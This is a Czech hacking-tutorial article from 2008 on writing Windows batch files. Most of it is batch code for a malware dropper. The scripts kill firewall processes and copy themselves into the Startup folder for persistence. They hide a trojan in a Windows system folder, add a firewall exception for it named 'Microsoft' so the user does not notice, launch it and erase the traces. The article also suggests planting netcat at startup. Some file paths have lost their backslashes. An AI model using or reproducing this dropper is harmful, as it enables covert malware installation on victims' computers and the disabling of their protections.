Zpět na seznam článků     Číst komentáře (14)     Verze pro tisk

Dávkové soubory

Autor: sk3l3t0n_   
6.2.2008

V tomhle článku se naučíte, jak vypínat firewall a vytvářet dávkové soubory


Oč tu běží?

Dávkový soubor je soubor *.bat, je součástí windows(ale ne ten, co jsme vytvořili my). Teda spíše na spuštění/vytvoření těchto souborů nepotřebujete absolutně nic, jen windows.(přesná definice není potřebná)

Soubor *.bat(bat) používá CMD(příkazový řádek)
Bat soubor je tedy odkaz pro CMD, jinak řečeno pro jeho funkce.

Patří k hacku?

Ano, jedna z mnoha výhod je, že si ho nevšimne ani antivirový systéma my mezitím můžeme vypnout firewall.

Začínáme...

1) Musíme si promyslet, co má dávkový soubor udělat (vyp.firewall, změnit registry, použít netcat(hodíte ho do startup file)a jiné.).

2.Napsat dávkový soubor (smysl tohoto článku)
Otevřeme si NotePad, pokud chcete přehlednější kód, tak si stáhněte PsPad, otevřete ho, dejte new a vyberte *.bat.
První soubor by měl být instalovací(kopírovací a spouštěcí, takže jméno bude například start.bat nebo install.bat (je to jedno jde jen o rozpoznání)

v tomto souboru je důležité, aby jsme dbali na postupnost (neboť pojud dáte první příkaz vypnout windows a druhý změň heslo, tak je více než jasné, že ten druhý se nevykoná.).

Takže celý start.bat spočívá v nakopírování a spuštění nějakéhosouboru[s připonou].
Pokud dosadíme to, co chceme, bude to vypadat následovně:

@ECHO OFF
copy disable.bat C: /Y

start c:disable.bat B


*tips
Pokud chcete kopírovat a spouštět víc programů, tak stačí jen postupovat takto:


@ECHO OFF
copy disable1.bat C: /Y
copy disable2.bat C: /Y
copy disable3.bat C: /Y

start c:disable1.bat B
start c:disable2.bat B
start c:disable3.bat B


Náš první dávkový soubor:
Teď vytvoříme dávkový soubor, který vypne soubor(nakopírujeme ho do složky startup aby se vypl firewall při každém spuštění). A ve Windows firewall vytvoří podmínku(vypnout ho nemůžeme, aby si uživatel nic nevšiml. Protože, když ho vypneme tak si to uživatel okamžite všimne)na soubor trojan.exe soubor trojan nakopíruje do složky startup.

Pojmenujeme si potřebné soubory.

Pokud neznáte jméno disku (teda nevíte jestli je na PC disk c alebo d dejte tam %homedrive% my předpokládáme, že je c:
předpokládáme, že kopírované soubory jsou ve složce se start.bat.

start.bat- kopíruje a spouští

@ECHO OFF
color A
COPY unfirewall.bat C: /Y
COPY copfi.bat C: /Y
COPY hidetrojan.bat C: /Y
COPY trojan.exe C: /Y
COPY wifirewall.bat C: /Y
COPY clear.bat C: /Y


START C:unfirewall.bat B
START C:copfi.bat B
START C:hidetrojan.bat B
START C:wifirewall.bat B
START C:trojan.exe B
START C:clear.bat B


unfirewall.bat - má funkci taskkill s přepínačemi /f /t /im (info najdete v cmd taskkill) a vypne firewall, jestli znáte další firewallové procesy tak je vypněte.

color A
taskkill /f /t /im kpf*
taskkill /f /t /im zlclient*


--------------------------------
copfi.bat - nakopíruje unfirewall do startupu

@ECHO OFF
color A
COPY unfirewall.bat "C:Documents and SettingsAll UsersStart MenuProgramsStartup" /Y


-------------------------------
hidetrojan.bat - nakopíruje trojan.exe do windows složky a pořádně schová

@ECHO OFF
color A
COPY trojan.exe "C:WINDOWSinfcatalog" /Y


wifirewall.bat - vytvoří podmínku pro trojan.exe

@ECHO OFF
color A
netsh firewall add allowedprogram program="C:WINDOWSinfcatalogtrojan.exe" name="Microsoft" profile=ALL


clear.bat - vymaže všechny naše soubory z C:

@ECHO OFF
color A
del c:unfirewall.bat /s /q
del c:copfi.bat /s /q
del c:hidetrojan.bat /s /q
del c:wifirewall.bat /s /q
del c:trojan.exe /s q
del c:clear.bat /s /q

Líbil se Vám článek?
Budeme potěšeni, pokud vás zaujme také reklamní nabídka

Social Bookmarking

     





Hodnocení/Hlasovalo: 3.14/7

1  2  3  4  5    
(známkování jako ve škole)